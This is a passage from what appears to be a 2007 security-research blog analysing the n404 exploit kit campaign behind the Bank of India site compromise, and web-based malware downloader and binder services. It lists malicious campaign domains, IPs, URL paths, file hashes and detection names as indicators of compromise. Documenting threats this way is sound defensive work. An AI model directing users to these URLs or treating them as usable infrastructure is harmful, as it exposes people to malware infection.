at the Bank of India. Is this a newly developed attack kit, or a modification of another popular one? Further attack clues will definitely indicate the second, namely that's it's a modification. In respect to this kit, it returns a 404 error within which is the obfuscated javascript, thus we have a fast-flux oriented kit aiming to diversify and include as many infected nodes in the attack process to improve its chances of infecting the host while the campaign remains in tact. The malicious URLs structure is again static just like Storm Worm's, and is in the following format n404-(number from 1 to 9).htm where each page contains a different malware.

Several more n404 exploit kit campaigns are currently active at the following URLs :

msiesettings.com - 81.95.148.14
winmplayer.com
smoothdns.net - 81.95.148.12
protriochki.com - 81.95.148.14
susliksuka.com - 81.95.148.12
uspocketpc.com - 81.95.148.13

The exact campaign URLs :

- mymoonsite.net/check/versionml.php?t=141
mymoonsite.net/check/version.php?t=15
mymoonsite.net/check/n404-1.htm
n404-(number from 1 to 9).htm

- uspocketpc.com/check/n404-1.htm
n404-(number from 1 to 9).htm

- s75.msiesettings.com/check/versionst.php?t=75
s75.msiesettings.com/check/n404-1.htm
n404-(number from 1 to 9).htm

- s99.winmplayer.com/check/n404-1.php
n404-(number from 1 to 9).htm

- smoothdns.net/check/n404-1.htm
n404-(number from 1 to 9).htm

- protriochki.com/check/n404-1.htm
n404-(number from 1 to 9).htm

- susliksuka.com/check/n404-1.htm
n404-(number from 1 to 9).htm

What makes an impression is that it's relying on as many possible malware infections as possible, thus visiting a central campaign site such as mymoonsite.net/check/version.php?t=158 results in all the n404 malicious pages within the domain to get automatically loaded via an IFRAME, and as you've successfully guesed, they all contain different types of malware. Despite that javascript obfuscation is often used to hide the real location of the exploit or binary, in this campaign each and every n404-1.htm obtained from all domains has the same checksum, therefore the files at the different domains are identical - at least so far :

File size: 10636 bytes
MD5: 45594ef52a9f53f2140d4797826156ff
SHA1: 7c4f7d183dfaf39410902a629b13ae5112b847f0

AntiVir 2007.08.31 HTML/Crypted.Gen
eSafe 2007.08.29 JS.Agent.ke
Fortinet 2007.08.31 HTML/Heuri.BIU!tr.dldr
F-Secure 2007.08.31 Trojan-Downloader.JS.Agent.no
Kaspersky 2007.08.31 Trojan-Downloader.JS.Agent.no
Webwasher-Gateway 2007.08.31 Script.Crypted.Gen

A great example of a fast-flux network with way too many infected hosts participating in the attack, and despite that some seems to be down, the attack is still fully operational in a typical fast-flux style.

UPDATE: F-Secure's and McAfee's comments on the case, as well as two related posts - Bank of India’s Website has been Compromised by Trojan downloader; Bank of India Official Web Site Unsafe at the Moment.

UPDATE 2: Several hours after the Bank of India got rid of the iframe at its homepage, the main URL for this malware campaign (81.95.144.148/in.cgi?10) removed the javascript obfuscation and is now forwarding to Google.com.

"We have taken up the matter with our technology-partner and all necessary action will be taken to rectify the matter. In my view, the users will not be faced with any major problems,” said BoI general manager PA Kalyansundar. “However, we are not completely sure that an attack actually happened,” he clarified."

Here's another article from The Register mentioning the three key points related to the campaign - the Russian Business Network, the n404 exploit kit which is definitely a modification of the popular ones currently in the wild, and the use of fast-flux networks. And this is what happened when an Indian tried to reach the local Cybercrime unit.
Continue reading →

Malware as a Web Service

0
August 31, 2007
Popular malware tools such as binders and downloaders usually come in a typical software application form. Moreover, when I talk about malware services I mean crypting, packing and limiting the detection rate on demand, while in this case we have a DIY malware as a web service, a trend to come or a fad to dissapear, only time will show but the possibilities for porting popular malware tools in a web service form are quite disturbing.

In the first example we have a malware downloader as a web service with various diversified variables such as custom port and IP to obtain the payload from, as well as the ability to modify the extraction and execution of it. Combined with the option to choose a packer, and whether or not to melt the downloader after it delivers the payload, as well as with the opportunity to choose from a set of predefined icons or select a custom one, turn this malware web service an interesting one to monitor.

A sample of the first service :

Result: 5/32 (15.63%)
BitDefender 2007.08.31 Generic.Malware.Fdld!.D8E4DF1F
eSafe 2007.08.29 suspicious Trojan/Worm
NOD32v2 2007.08.30 probably unknown NewHeur_PE virus
Sophos 2007.08.30 Mal/Heuri-D
Webwasher-Gateway 2007.08.30 Trojan.Downloader.Win32.ModifiedUPX.gen (suspicious)

File size: 11776 bytes
MD5: e9df373f1561bed2a2899707869a7a44
SHA1: 295c6702cb19f6b20720057d61d940921602a0cd

In the second example, we have a malware binder as a web service with pretty much identical features with the first example. If traders of malware services such as the above mentioned crypting, packing and ensuring a lower detection rate, start embracing Web 2.0 in the process of efficiently construction malware, or providing their customers with a DIY experience by constantly ensuring their " web dashboard" is up to date with new services and features - it can get very ugly. So, let's hope it's just a fad.
Continue reading →
Subscribe to: Comments (Atom)